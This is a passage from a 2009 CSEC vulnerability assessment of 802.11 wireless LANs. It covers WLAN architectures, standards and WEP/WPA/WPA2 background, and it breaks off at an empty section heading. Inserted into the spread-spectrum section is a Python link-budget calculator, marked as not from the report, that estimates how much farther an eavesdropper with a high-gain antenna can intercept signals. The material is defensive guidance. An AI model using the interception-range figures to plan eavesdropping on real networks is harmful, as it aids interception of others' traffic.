802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
UNCLASSIFIED
IT SECURITY TECHNICAL PUBLICATION
ITSPSR-21A
May 2009

Foreword

The 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) is an UNCLASSIFIED publication, issued under the authority of the Chief, Communications Security Establishment Canada (CSEC).

Suggestions for amendments should be forwarded through departmental communications security channels to your Client Services Representative at CSEC. Requests for additional copies or changes in distribution should be directed to your Client Services Representative at CSEC.

For further information, please contact CSEC's ITS Client Services area by e-mail at client.svcs@cse-cst.gc.ca or call (613) 991-7600.

Effective Date

This publication takes effect on May 1st, 2009.

Gwen Beauchemin
Director, Mission Management
Government of Canada, Communications Security Establishment Canada

© 2009. It is not permissible to make copies or extracts from this publication without the written consent of CSEC.
Executive Summary

WLAN devices based on the IEEE 802.11 standard have a number of vulnerabilities related to the fact that wireless signals are sent over the air rather than through closed wiring paths. In WLANs, network traffic is broadcast into uncontrolled public spaces, which may result in the compromise of sensitive information. Additionally, signals from unauthorized external sources may easily enter the network, allowing attackers to join the network as though they were bona fide users. This creates risks not only for the WLAN but also for any other network to which it is connected. These risks may also arise on traditional wired networks because it is easy and inexpensive for users to install their own WLAN devices without the knowledge or consent of network authorities. The risk of outside attack is very high: "war driving" is common, and free, simple-to-use software tools for discovering and exploiting WLANs are readily available and may allow outsiders to penetrate the network.

The 802.11 standard originally included provision for a security scheme known as Wired Equivalent Privacy (WEP), which provided some protection against casual interception of network traffic or insertion of unauthorized traffic. However, WEP suffered from serious design weaknesses that made it vulnerable to widely available exploitation tools. Later security mechanisms, Wi-Fi Protected Access (WPA, an interim Wi-Fi Alliance specification) and IEEE 802.11i (certified by the Wi-Fi Alliance as WPA2), address the weaknesses in previous schemes. WPA2 features strong, AES-based encryption (some brands/models of WLAN APs carry FIPS 140-2 validation), as well as 802.1X enterprise authentication, which allows WLAN access authentication to be integrated with existing corporate user authentication mechanisms (smart cards, tokens, PKI, biometrics, etc.). Practical attacks against WPA2 are few and primarily targeted at Pre-Shared Key (PSK) deployments.

Note that these security features are usually turned off by default and must be enabled to have any effect: WLANs deployed without enabling security features leave the network wide open to discovery and attack.

CSEC recommends that WPA2 security be mandatory, with 802.1X authentication wherever possible, for all unclassified WLAN deployments within the Government of Canada. Older equipment not supporting WPA2 must be replaced or upgraded. In instances where especially sensitive information may be transferred over a WLAN, additional security measures such as end-to-end encryption or VPNs should also be deployed. Other essential protection measures include network monitoring for unusual traffic and to detect the installation of unauthorized wireless devices.

CSEC is in the process of developing a comprehensive security solution to mitigate the risk of 802.11 WLAN technology. This solution will combine a variety of measures including the use of firewalls, Virtual Private Network (VPN) encryption and strong authentication, which departments should deploy to isolate WLANs from sensitive government networks.
Revision History

Document No.   Title                                          Release Date
ITSPSR-21      802.11 Wireless LAN Vulnerability Assessment   November 2002
Table of Contents

Foreword
Effective Date
Executive Summary
Revision History
Table of Contents
List of Abbreviations and Acronyms
1 Introduction
  1.1 Background
  1.2 Purpose
  1.3 Scope
  1.4 Document Structure
2 802.11 WLAN System Overview
  2.1 Technology
    2.1.1 Background
    2.1.2 Infrared (IR) Technology
    2.1.3 Radio Frequency (RF) Technology
  2.2 Architecture
    2.2.1 General
    2.2.2 Ad Hoc Mode
    2.2.3 Infrastructure Mode
    2.2.4 Distribution System Mode
    2.2.5 Wireless Distribution System Mode
    2.2.6 Wireless Mesh Networks
  2.3 WLAN Standards
  2.4 IEEE 802.11 Standards
    2.4.1 Background
    2.4.2 IEEE 802.11 Task Groups/Amendments
  2.5 Wi-Fi Interoperability Standard
    2.5.1 Wireless Ethernet Compatibility Alliance (WECA) and the Wi-Fi Alliance
3 Security Mechanisms
  3.1 General
  3.2 Access Control
    3.2.1 General
    3.2.2 Service Set Identifier (SSID)
    3.2.3 MAC Address Access Control List (ACL)
  3.3 Authentication Services
    3.3.1 General
    3.3.2 Open System Authentication
    3.3.3 Shared Key Authentication
    3.3.4 802.1X Authentication
  3.4 Data Confidentiality and WEP/WPA/802.11i/WPA2
    3.4.1 General
    3.4.2 Wired Equivalent Privacy (WEP) Protocol
    3.4.3 Wi-Fi Protected Access (WPA)
    3.4.4 IEEE 802.11i/Wi-Fi Protected Access version 2 (WPA2)
4 Vulnerabilities
  4.1 Access Control Vulnerabilities
    4.1.1 General
    4.1.2 SSID
    4.1.3 MAC Address Access Control List (ACL)
  4.2 Authentication Mechanism Vulnerabilities
    4.2.1 General
    4.2.2 Shared Key Authentication Flaw
    4.2.3 802.1X/EAP Vulnerabilities
  4.3 WEP Vulnerabilities
    4.3.1 General
    4.3.2 Keystream Re-use
    4.3.3 Message Integrity
    4.3.4 Key Management
  4.4 WPA/WPA2 Vulnerabilities
    4.4.1 General
    4.4.2 Key Management
    4.4.3 4-Way Handshake and Weak Passphrase Vulnerability
    4.4.4 WPA MIC Spoofing Countermeasure
  4.5 Configuration Defaults
  4.6 Simple Network Management Protocol (SNMP)
5 Exploits
  5.1 Network Discovery and Access Attacks
    5.1.1 General
    5.1.2 Network Discovery
    5.1.3 Network Access via Wireless Router
  5.2 Denial of Service (DoS) Attacks
    5.2.1 General
    5.2.2 AP Takeover
    5.2.3 AP Cloning
    5.2.4 RF Jamming
  5.3 WEP Protocol Attack
    5.3.1 General
    5.3.2 Passive Attack
    5.3.3 Active Attacks
    5.3.4 Decryption Table Attack
  5.4 WPA/WPA2 Attacks
    5.4.1 General
    5.4.2 Pre-Shared Key Dictionary Attack
  5.5 Monitoring and Interception Attacks
    5.5.1 General
    5.5.2 Traffic Sniffing
    5.5.3 Broadcast Monitoring
    5.5.4 Man-in-the-Middle Attack
6 Solutions
  6.1 Overview
  6.2 Determine Range of Your Network Coverage
  6.3 Do Not Broadcast Your SSID
  6.4 Do Not Use the Default SSID
  6.5 Use WPA2
  6.6 Use 802.1X Server-based Authentication
  6.7 Change the Key Frequently
  6.8 Use a VPN and Firewall to Isolate the WLAN
  6.9 Use a Personal Firewall on Every Wireless Client
  6.10 Consider Wireless Intrusion Detection/Prevention Systems
7 Future Work
8 Conclusions and Recommendations
9 References
List of Abbreviations and Acronyms

AES      Advanced Encryption Standard
ACL      Access Control List
AP       Access Point
ARP      Address Resolution Protocol
ATM      Asynchronous Transfer Mode
BSS      Basic Service Set
CBC      Cipher Block Chaining mode
CCMP     Counter mode with CBC-MAC Protocol
CRC      Cyclic Redundancy Check
CSEC     Communications Security Establishment Canada
DHCP     Dynamic Host Configuration Protocol
DES      Data Encryption Standard
3DES     Triple DES
DoS      Denial of Service
DSSS     Direct Sequence Spread Spectrum
EAP      Extensible Authentication Protocol
ESS      Extended Service Set
ETSI     European Telecommunications Standards Institute
FCC      Federal Communications Commission
FHSS     Frequency-Hopping Spread Spectrum
FIPS     Federal Information Processing Standards (USA)
GC       Government of Canada
GHz      Gigahertz
GPS      Global Positioning System
HiperLAN High Performance Radio Local Area Network (ETSI)
IBSS     Independent Basic Service Set
IEC      International Electrotechnical Commission
IEEE     Institute of Electrical and Electronics Engineers
IP       Internet Protocol
IR       Infrared
IrDA     Infrared Data Association
ISM      Industrial, Scientific and Medical
ISO      International Organization for Standardization
IT       Information Technology
ITS      Information Technology Security
IV       Initialization Vector
LAN      Local Area Network
MAC      Medium Access Control (networking) or Message Authentication Code (cryptography)
MAN      Metropolitan Area Network
Mbps     Megabits per second
MIC      Message Integrity Code
MIMO     Multiple-Input/Multiple-Output
NAI      Network Access Identifier
OCB      Offset Codebook
OFDM     Orthogonal Frequency Division Multiplexing
OSI      Open Systems Interconnection
PHY      Physical (Layer)
PMK      Pairwise Master Key
PKI      Public Key Infrastructure
PPP      Point-to-Point Protocol
PRNG     Pseudo-Random Number Generator
PSK      Pre-Shared Key
PTK      Pairwise Transient Key
RC4      Rivest Cipher 4 / Ron's Code 4 (encryption algorithm)
RF       Radio Frequency
RSN      Robust Security Network
SNMP     Simple Network Management Protocol
SSH      Secure Shell
SSID     Service Set Identifier
TKIP     Temporal Key Integrity Protocol
TMTO     Time-Memory Trade-Off
UMTS     Universal Mobile Telecommunications System
VPN      Virtual Private Network
WAN      Wide Area Network
WECA     Wireless Ethernet Compatibility Alliance (see also WFA)
WEP      Wired Equivalent Privacy
WFA      Wi-Fi Alliance (new name for WECA)
WIDS     Wireless Intrusion Detection System
Wi-Fi    Wireless Fidelity, a trademark of the Wi-Fi Alliance
WIPS     Wireless Intrusion Prevention System
WLAN     Wireless Local Area Network
WPA      Wi-Fi Protected Access
WPA2     Wi-Fi Protected Access version 2
WPAN     Wireless Personal Area Network
WRAP     Wireless Robust Authenticated Protocol
XOR      Exclusive OR
1 Introduction

1.1 Background

With the rapidly increasing adoption of 802.11 technology, WLAN products have become mainstream and increasingly common in business, education and home environments. The enhanced mobility and productivity offered by wireless technology, along with the long-term cost saving and ease of installation, have attracted organizations to make the move to this technology. However, both federal departments and private companies are often deploying wireless networks without fully understanding the security risks associated with their use.

1.2 Purpose

This report describes vulnerabilities of, and mitigations for, the use of an 802.11 WLAN in the federal government environment. It is based on an analysis of the information discovered in the test laboratory at CSEC and on information currently available through open sources such as manufacturers and technological organizations and associations. The primary goal of this vulnerability assessment report is to provide government clients with a better understanding of the risks involved prior to developing plans for wireless network deployments.

1.3 Scope

This report focuses on the main commercially available variants of the WLAN standard: 802.11b, 802.11g and the soon-to-be-approved 802.11n. Their present popularity, relative maturity and the wide availability of products make these versions of the standard the best models for a vulnerability assessment of 802.11 WLAN technology. It must be pointed out, however, that most of the information provided in this document is not exclusive to 802.11b/g/n but also applies, to various degrees, to 802.11a and other 802.11 WLAN standards.

1.4 Document Structure

This report provides a brief overview of WLAN architectures and the IEEE 802.11 standard that dominates the WLAN market today, followed by an explanation of the security mechanisms, the vulnerabilities of those mechanisms and some commonly known 802.11 exploits. Interim steps to mitigate the problems are also included.
2 802.11 WLAN System Overview

2.1 Technology

2.1.1 Background

Unlike conventional LANs, which rely on physical connections of copper wire or optical fibre to transport information, wireless LANs (WLANs) use infrared (IR) light or radio frequency (RF) electromagnetic waves to transmit and receive data. Wireless technology provides all of the functionality of wired LANs but removes the physical constraints imposed by the need to hard-wire the user community. This simplifies and speeds up network installation and increases flexibility and scalability, while allowing greater user mobility. These advantages, combined with the ever-increasing data bandwidth offered by wireless technology, make WLANs an attractive alternative for individuals and organizations that plan to implement or expand a LAN without having to install or move wires.

In a WLAN environment, each computer that requires over-the-air connectivity must be equipped with a WLAN adapter. These adapters normally take the form of plug-in cards for installation in the expansion slots of desktop computers, or PC Cards or USB dongles for notebooks and laptops. These cards and adapters are simply network interface cards with a built-in radio transceiver and a miniature antenna that provide the RF communication link (or, in the case of IR-based WLANs, an infrared emitter/detector pair). Virtually all recent laptop models come with some variety of wireless interface built in (one or more of IR, 802.11 and Bluetooth). While this practice increases convenience and reduces the number of additional cards and adapters that must be carried by the user, it adds the complication that in most cases such built-in wireless hardware cannot be easily upgraded to take advantage of new security or user features.

2.1.2 Infrared (IR) Technology

IR is used in a variety of Information Technology (IT) applications including WLANs and wireless interfaces for connecting computers and peripheral devices, commonly known as serial IR links. IR was originally a non-standardized technology, with each vendor and equipment manufacturer implementing a proprietary protocol; however, the Infrared Data Association (IrDA) was quickly formed to produce a set of standards governing IR computer connectivity. The IrDA Data standard addresses the use of IR for high-speed, short-range, line-of-sight, point-to-point wireless data transfer. The IrDA Control standard covers the communications between PCs and wireless peripherals such as the keyboard or mouse. Laser technology is also employed to establish optical data links capable of transmitting information in a direct line of sight for distances of several kilometres.

The legacy IEEE 802.11 standard also defines the use of infrared as a transmission technology; however, no commercial 802.11 IR products are known to have been developed and this portion of the standard has not been updated since the initial release of the standard in 1997.
2.1.3 Radio Frequency (RF) Technology

2.1.3.1 General

RF has become the de facto technology for the majority of today's WLANs. Radio signals can travel in all directions for distances ranging from a few metres to several kilometres. These characteristics can be very practical in situations where wide or long-range coverage is required, but they become problematic when the signal's propagation needs to be limited. The fact that the destination of radio signals cannot be precisely controlled makes this medium the most vulnerable to undetected interception and exploitation. All unprotected radio traffic can be monitored with widely available radio equipment by anyone located within range of the transmitter. It is important to note that amplifiers and high-gain antennas can be used solely at the receiver to increase the range at which a signal can be received, so simply reducing transmitter power is not sufficient to limit where signals can be intercepted. For example, the use of RF wireless computer keyboards should be avoided for the processing of sensitive information: they broadcast the information that is typed on them, and even though their transmit power is comparatively low, this information may still be intercepted at range. In addition to signal interception, RF communications are also subject to spurious and deliberate electromagnetic interference that can result in the inability to communicate.

2.1.3.2 Spread Spectrum

Spread-spectrum communications technology has been claimed to alleviate the vulnerabilities of narrowband RF transmission. Unlike narrowband systems, which transmit a powerful signal on a single frequency, spread-spectrum systems transmit a low-power signal over a broad range of frequencies. The signal is spread according to pre-established parameters or patterns that must also be known by the receiver so that it can recover the signal. This transmission technique provides more resistance to noise and interference and is less vulnerable to jamming and casual interception. In the case of WLANs, the hardware must know the spreading parameters in order to receive a spread-spectrum signal, so these parameters are fixed by the standard and pre-programmed into the chipsets used to build these products. Although these chipsets were intended to be built into standalone WLAN AP and workstation hardware, tools and methods for using these pre-programmed receivers to intercept spread-spectrum WLAN communications inevitably followed. Many such tools are freely available on the Internet; therefore none of the spread-spectrum technologies should be considered sufficient to secure a WLAN.

Several signal-spreading schemes have been developed, but the methods that prevail in the WLAN domain are:

  1. Frequency Hopping Spread Spectrum (FHSS)
  2. Direct Sequence Spread Spectrum (DSSS)
  3. Orthogonal Frequency Division Multiplexing (OFDM)
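The point made in 2.1.3.1, that gain added only at the receiver defeats any attempt to limit interception by turning the transmitter down, can be put in numbers with a free-space link budget. The Python below is an added worked example and is not from the CSEC report; the transmit power, antenna gains and receiver sensitivities are assumed, illustrative figures for a 2.4 GHz (channel 6) link, and free-space loss is a best case (walls and foliage shorten every distance below, but not the ratio between the two receivers, which depends only on the decibels the attacker adds on the receive side).

```python
import math


def fspl_db(distance_m: float, freq_mhz: float) -> float:
    """Free-space path loss in dB (Friis), distance in metres, frequency in MHz.
    The constant 32.44 is the usual value for km/MHz units."""
    if distance_m <= 0 or freq_mhz <= 0:
        raise ValueError("distance and frequency must be positive")
    return 20 * math.log10(distance_m / 1000.0) + 20 * math.log10(freq_mhz) + 32.44


def rx_power_dbm(tx_dbm: float, tx_gain_dbi: float, rx_gain_dbi: float,
                 distance_m: float, freq_mhz: float) -> float:
    """Received power: transmit power plus both antenna gains minus path loss."""
    return tx_dbm + tx_gain_dbi + rx_gain_dbi - fspl_db(distance_m, freq_mhz)


def max_range_m(tx_dbm: float, tx_gain_dbi: float, rx_gain_dbi: float,
                rx_sens_dbm: float, freq_mhz: float) -> float:
    """Largest free-space distance at which received power still meets the
    receiver sensitivity: fspl_db inverted for the whole link budget."""
    budget_db = tx_dbm + tx_gain_dbi + rx_gain_dbi - rx_sens_dbm
    d_km = 10 ** ((budget_db - 20 * math.log10(freq_mhz) - 32.44) / 20)
    return d_km * 1000.0


def intercept_range_ratio(tx_dbm: float, tx_gain_dbi: float, freq_mhz: float,
                          client_gain_dbi: float, client_sens_dbm: float,
                          attacker_gain_dbi: float, attacker_sens_dbm: float) -> float:
    """How much farther than a normal client an eavesdropper can sit when only
    the receive side differs (the AP and its transmit power are the same)."""
    client = max_range_m(tx_dbm, tx_gain_dbi, client_gain_dbi, client_sens_dbm, freq_mhz)
    attacker = max_range_m(tx_dbm, tx_gain_dbi, attacker_gain_dbi, attacker_sens_dbm, freq_mhz)
    return attacker / client


if __name__ == "__main__":
    # Assumed figures: 20 dBm AP with a 2 dBi antenna on 2437 MHz; a laptop with a
    # 2 dBi antenna and -90 dBm sensitivity; an attacker with a 24 dBi parabolic
    # grid antenna and a -95 dBm receiver. Nothing about the AP changes.
    f = 2437.0
    print(f"client range:            {max_range_m(20, 2, 2, -90, f):8.0f} m")
    print(f"attacker range:          {max_range_m(20, 2, 24, -95, f):8.0f} m")
    print(f"attacker/client ratio:   {intercept_range_ratio(20, 2, f, 2, -90, 24, -95):8.1f}x")
    # Turning the AP down 6 dB halves everyone's range; the attacker's 27 dB of
    # receive-side advantage is still worth a factor of about 22 in distance.
    print(f"AP at 14 dBm, attacker:  {max_range_m(14, 2, 24, -95, f):8.0f} m")
```

Every 20 dB added on the receive side multiplies the interception distance by ten, which is why section 6.2 of the report asks you to determine the real coverage of your network rather than trust the transmitter's nominal range.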
FHSS and DSSS are the original spread-spectrum technologies employed in 802.11 WLANs. The concept of expanding spectral use through frequency hopping is fairly self-explanatory; DSSS is based on the mathematical principle of convolution and provides a greater data throughput and a higher immunity to interference than FHSS. OFDM is a multi-carrier wideband modulation scheme introduced in the 802.11g revision and provides even greater data throughput and is much more resistant to interference than the previous schemes. 802.11n introduces OFDM+MIMO, which continues to use the same 2.4 GHz frequency band and basic modulation scheme of OFDM, but adds techniques for using multiple transmitters and receivers while taking into account temporal and spatial characterization of the RF environment. This effectively increases the available bandwidth using a practice known as "channel bonding" (combining multiple adjacent channels into one large channel) to further increase range and throughput.

2.2 Architecture

2.2.1 General

There are five forms of wireless network architecture currently allowed in the overall 802.11 standard: Ad-Hoc Mode, Infrastructure Mode, Distribution System Mode, Wireless Distribution System Mode and Wireless Mesh.

2.2.2 Ad Hoc Mode

In the ad-hoc mode, as illustrated in Figure 1, wireless devices create a LAN by communicating freely and directly with each other without a centralized base station. This architecture is also referred to as the peer-to-peer network or the Independent Basic Service Set (IBSS). This network structure is easy to implement as it requires no infrastructure and minimal administration, but the transfer of information is limited to the propagation range of the transmitting device.

Figure 1 - WLAN in Ad Hoc Mode
2.2.3 Infrastructure Mode

In the more commonly used infrastructure mode, the network is built around a central base station, or Access Point (AP). The information transmitted by the originating device is received by the AP and routed to the proper destination. As illustrated in Figure 2, the AP is physically connected to the wired LAN's backbone and it provides the communication link between the wireless client devices and any of the wired network devices. The AP also functions as a radio relay capable of forwarding information to/from wireless devices that are too distant to communicate directly with each other. The infrastructure mode is referred to as the Basic Service Set (BSS).

Figure 2 - WLAN in Infrastructure Mode

2.2.4 Distribution System Mode

The distribution system mode is also referred to as Extended Service Set (ESS) mode. In the distribution system mode, multiple APs are connected to the wired network by a switching or bridging device, enabling a WLAN client to roam between APs, thus providing greater range and mobility. Roaming capability is also provided to mobile users. Note that the roaming capability requires special AP support and may not be available on all brands/models of AP. Additionally, the inter-AP communication required to support wireless roaming is not covered by the 802.11 standard as it is a higher-layer protocol, and most manufacturers either do not implement this feature or utilize a proprietary protocol; thus in general, roaming between different brands of AP is not possible, even though they may be connected to the same network.

In an 802.11 WLAN system operating in distribution mode, as a user moves around and out of range of an AP, the user's mobile device will re-associate with the next AP in the extended set. Therefore it will remain "connected" to the network and able to start and receive new connections on the new AP. However, without dedicated AP roaming support, any existing open network sessions on the old AP will generally not follow the user to the new AP (unless the particular application in use by the user has its own roaming capability). This LAN structure is more complex and, in the case of RF-based wireless devices, requires careful frequency or channel management so that APs do not interfere with each other.
Figure 3 - WLAN in Distribution System Mode

2.2.5 Wireless Distribution System Mode

In the Wireless Distribution System (WDS) mode, a wireless link is used to interconnect multiple APs, allowing the wireless network to be expanded without the need for wired infrastructure. The reduction in wired infrastructure allowed by WDS comes at the expense of throughput. Because each AP must re-broadcast any received WDS traffic in a "repeater"-like fashion, wireless throughput is cut approximately in half for each hop that a message must travel over, so that wireless clients at the end of a long string of WDS-connected APs may see very poor throughput. Additionally, like the wireless roaming functionality discussed previously, WDS requires Layer 3 and 4 interaction to manage the routing, and this aspect is not standardized under 802.11, which deals primarily with Layers 1 and 2; thus WDS may be incompatible between different brands of AP. Finally, in WDS, all APs in the chain must share the same radio channel and security keys, therefore dynamically assigned encryption keys (e.g. enterprise WPA/WPA2) are generally not supported over a WDS connection.

Figure 4 - WLAN in Wireless Distribution System Mode

2.2.6 Wireless Mesh Networks

Wireless mesh networks combine features of ad-hoc wireless networks with those of infrastructure wireless networks in wireless distribution system mode. The result is a robust wireless infrastructure network that may be deployed with minimal wiring and cabling costs but is no longer confined to a local area; it normally extends to Metropolitan Area Network (MAN) or Wide Area Network (WAN) scales.

Wireless mesh network products have previously been released under proprietary standards, but have begun to converge under the banner of the Wi-Mesh Alliance and the proposed 802.11s standard. This standard allows both wireless mesh ad-hoc networks and wireless mesh infrastructure networks and defines the routing protocols needed to make the system work. Security for the proposed standard includes the definition of 802.11i, but adds enhancements to deal with re-keying and authentication issues in this architecture.

Figure 5 - WLAN in Wireless Mesh Mode

2.3 WLAN Standards

Wireless networking technology has matured through the development of proprietary systems by various manufacturers. In the absence of formal standards, many manufacturers introduced their own; however, most of these proprietary systems have been superseded by systems based on the various IEEE standards. Table 1 identifies some of the leading and competing standards and lists some of their specifications and intended applications. The products that are offered under most of these proprietary standards are not interoperable. Another issue is the opportunity for interference among the products from the different manufacturers, causing a reduction in data throughput. Because many standards use the same unlicensed frequency band, spread-spectrum technology cannot completely eliminate the possibility of packet collisions.

In addition to the standards described in the table, still other wireless networking standards are in use. These standards are unrelated to 802.11 and are intended to meet different needs; they include standards for Wireless USB (IEEE 802.15.3), ZigBee industrial control (802.15.4), and standards for WiMAX wireless metropolitan area networks (802.16e).
Table 1 – Key WLAN Standards

IEEE 802.11
  Frequency: 2.4 GHz
  RF Technology: FHSS or DSSS
  Max Transfer Rate: 2 Mbps
  Typical Outdoor Range: 100 metres
  Security: Wired Equivalent Protection (WEP)
  Encryption: 40-bit RC4
  Fixed network support: Ethernet
  Applications: Wireless Data

802.11b
  Frequency: 2.4 GHz
  RF Technology: DSSS
  Max Transfer Rate: 11 Mbps
  Typical Outdoor Range: 150 metres
  Security: Wired Equivalent Protection (WEP) + optional WiFi Protected Access (WPA)
  Encryption: up to 104-bit RC4 (WEP), 128-bit RC4 w/ TKIP key scheduling (WPA)
  Fixed network support: Ethernet
  Applications: Wireless Data

802.11a
  Frequency: 5 GHz
  RF Technology: OFDM
  Max Transfer Rate: 54 Mbps
  Typical Outdoor Range: 120 metres
  Security: Wired Equivalent Protection (WEP) + optional WiFi Protected Access (WPA)
  Encryption: up to 104-bit RC4 (WEP), 128-bit RC4 w/ TKIP key scheduling (WPA)
  Fixed network support: Ethernet
  Applications: Wireless Data

802.11g
  Frequency: 2.4 GHz
  RF Technology: OFDM
  Max Transfer Rate: 54 Mbps
  Typical Outdoor Range: 150 metres
  Security: Wired Equivalent Protection (WEP) / WiFi Protected Access (WPA) / 802.11i (WPA2)
  Encryption: up to 104-bit RC4 (WEP), 128-bit RC4 w/ TKIP key scheduling (WPA), 128-bit AES (WPA2)
  Fixed network support: Ethernet
  Applications: Wireless Data

802.11n (Draft 2.0)
  Frequency: 2.4 GHz
  RF Technology: OFDM+MIMO
  Max Transfer Rate: 248 Mbps
  Typical Outdoor Range: 250 metres
  Security: Wired Equivalent Protection (WEP) / WiFi Protected Access (WPA) / 802.11i (WPA2)
  Encryption: up to 104-bit RC4 (WEP), 128-bit RC4 w/ TKIP key scheduling (WPA), 128-bit AES (WPA2)
  Fixed network support: Ethernet
  Applications: Wireless Data

HiperLAN (ETSI)
  Frequency: 2.4 GHz
  RF Technology: Single carrier
  Max Transfer Rate: 23 Mbps
  Typical Outdoor Range: 100 metres
  Security: NAI/IEEE address/X.509
  Encryption: DES, 3DES
  Fixed network support: Ethernet
  Applications: Wireless Data

HiperLAN/2 (ETSI)
  Frequency: 5 GHz
  RF Technology: Single carrier
  Max Transfer Rate: up to 54 Mbps
  Typical Outdoor Range: 100 metres
  Security: NAI/IEEE address/X.509
  Encryption: DES, 3DES
  Fixed network support: Ethernet, IP, ATM, UMTS, FireWire, PPP
  Applications: Wireless Multimedia

HomeRF
  Frequency: 2.4 GHz
  RF Technology: FHSS
  Max Transfer Rate: 1.6 Mbps
  Typical Outdoor Range: 50 metres
  Security: Optional
  Encryption: 128-bit
  Fixed network support: Ethernet
  Applications: Wireless Data, Wireless Voice

IEEE 802.15.1 Bluetooth
  Frequency: 2.4 GHz
  RF Technology: FHSS
  Max Transfer Rate: 1 Mbps
  Typical Outdoor Range: 10 metres
  Security: Challenge-response using secret key (Bluetooth 1.0-2.0), Elliptic Curve Diffie-Hellman (Bluetooth 2.1)
  Encryption: 128-bit E0 cipher, SAFER+, ECDH (in version 2.1 and later)
  Fixed network support: PPP, Ethernet
  Applications: Cable Replacement, Wireless Data, Wireless Voice
2.4 IEEE 802.11 Standards

2.4.1 Background

In 1985, the U.S. Federal Communications Commission (FCC) decided to open the Industrial, Scientific, and Medical (ISM) bands, operating at 902 to 928 MHz, 2.4 to 2.483 GHz, and 5.725 to 5.875 GHz, for unlicensed public use. This not only fulfilled a demand for commercial communication, but it also sparked the development of WLAN technology. The Institute of Electrical and Electronics Engineers (IEEE) established the 802.11 WLAN standard [1] in 1997 in an attempt to standardize wireless LAN products utilizing the ISM band. This standard has since been adopted by the International Organization for Standardization / International Electrotechnical Commission (ISO/IEC).

The IEEE 802.11 core specification addresses both the Physical (PHY) and Data Link layers of the Open Systems Interconnection (OSI) Basic Reference Model. The legacy standard proposed three (mutually incompatible) implementations for the physical layer: IR pulse modulation, RF signaling using FHSS, and RF signaling using DSSS. The most obvious difference between the WLAN and the traditional wired LAN is the physical medium for data transmission; there is no physical wiring required for the 802.11 network.

The IEEE 802.11 standard has several key amendments. Products compliant to the 802.11a, b and g amendments are in common use today, with an increasing number of products based on the "Draft 2.0" release of 802.11n. Key specifications for each of these amendments can be found in Table 1.

Historically, the first successful commercial 802.11 WLAN products were compliant with the 802.11b standard. Both the 802.11a and b amendments were actually adopted at the same time, but because 802.11b was less complex than 802.11a, products compliant with the 802.11b standard rapidly materialized, while products under 802.11a only reached the market in 2002. Since that time, the 802.11g amendment, which utilizes the same 2.4 GHz band as 802.11b but delivers faster and more robust connections as well as greater range, has come to dominate the market. Although in terms of number of units sold 802.11b products still comprise the majority of the global WLAN market, sales of 802.11g products are poised to surpass this.

2.4.2 IEEE 802.11 Task Groups/Amendments

2.4.2.1 General

Core-standard 802.11 WLANs based on IR transport were never commercially implemented, and the RF-based versions suffered from low transmission speed (2 Mbps). The IEEE later established several task groups to explore various improvements to the original 802.11 core standard.
2.4.2.2 802.11a Amendment

Task Group A explored the unlicensed 5.0 GHz frequency band, using Orthogonal Frequency Division Multiplexing (OFDM), working to achieve throughputs up to 54 Mbps. The 802.11a extension [2] was completed in 1999 and in 2002 vendors began releasing products compliant to this extension. Because of the different operating band and modulation, the 802.11a standard is not backward compatible or interoperable with the 802.11b standard. Several vendors are marketing dual-band, multi-standard (802.11a and 802.11b/g) APs. 802.11a is currently licensed for use in North America and most European countries; however, commercial use of 802.11a has historically been quite limited.

Recently, 802.11a has enjoyed somewhat of a resurgence in popularity due to the development of enterprise mesh infrastructure networks. In such networks, 802.11a is used for communications between APs, and 802.11b/g is used for communications between APs and wireless clients.

2.4.2.3 802.11b Amendment

Task Group B explored DSSS technology to boost data rates in the original 2.4 GHz band. The 802.11b extension [3], published in September 1999, delivers raw data rates up to 11 Mbps, which gave data rate parity with the popular 10 Mbps "10Base" wired LAN systems of the day. The majority of WLAN systems in the market today follow the 802.11b standard and it is accepted throughout North America, Europe and Asia.

2.4.2.4 802.11g Amendment

Task Group G approved the development of the new extension to the 802.11 standard in November 2001; the resultant amendment was approved in 2003. 802.11g operates at 2.4 GHz with mandatory compatibility to 802.11b and uses the OFDM multicarrier modulation scheme to achieve a maximum data rate of 54 Mbps.

2.4.2.5 802.11n Amendment

Task Group N is currently engaged in the development of the higher data rate extensions to the 802.11 standard.
As with 802.11b and g, the 802.11n standard will operate at 2.4 GHz with mandatory compatibility to 802.11b/g and uses OFDM with MIMO techniques to achieve a maximum projected data rate of 248 Mbps. As described earlier in this document, OFDM+MIMO utilizes the same basic modulation as 802.11g. However, it utilizes multiple transceivers with advanced techniques to compensate for both the spatial and temporal variations of the RF channel, as well as the practice of "channel bonding", in order to greatly increase the range and raw data rate. 802.11n is still in the draft stage with an expected final approval in 2010; however, many "Pre-N" or "Draft-N" products have already begun emerging on the market. Consumers are cautioned when purchasing such products because, as draft-based products, they are not subject to the same interoperability testing as full-standard-compliant products. As such, they are not guaranteed to be compatible with, and may not be upgradeable to, the finalized release of the standard.

2.4.2.6 802.11i Amendment

Unlike the previously listed amendments, 802.11i is not focused on RF technologies, frequencies and data rates. Instead, Task Group I was tasked with addressing the security vulnerabilities in the existing WEP security. Although work on 802.11i began in 2000, it was not ratified until 2004. Recognizing a need to improve 802.11 WLAN security sooner rather than later, in 2001 the Wi-Fi Alliance developed an interim improved security standard based on a draft of 802.11i. This interim release was dubbed Wi-Fi Protected Access (WPA) and turned out to be largely compatible with the finalized 802.11i, which was subsequently given the name Wi-Fi Protected Access version 2 (WPA2). This is the name that 802.11i is commonly known by today.

WPA2 improves on the basic WEP security framework in several ways. Firstly, by adding improved authentication: all authentication schemes allowed under the Extensible Authentication Protocol (EAP), defined by RFC 3748, are supported by 802.11i; however, most commercial products only support a limited number of modes, namely enterprise authentication using a RADIUS server and the pre-shared key mechanism carried over from WEP. Secondly, by significantly improving the strength of the cryptographic algorithms: 128-bit AES-CCMP is used as the encryption algorithm in WPA2, which provides a substantial security margin over the RC4, CRC-32 and "Michael" algorithms used previously in WEP and WPA.

While WPA2/802.11i has addressed the majority of WEP deficiencies, one surprising criticism levelled at WPA2 was its use of AES encryption, which, although very strong, also significantly increased the processing requirements, which many devices utilizing slower microprocessors were unable to fulfill.
As a result, there still exist many devices on the market which only implement the interim WPA standard, with its reduced processing requirements and somewhat weaker security.

2.4.2.7 Other 802.11 Extensions

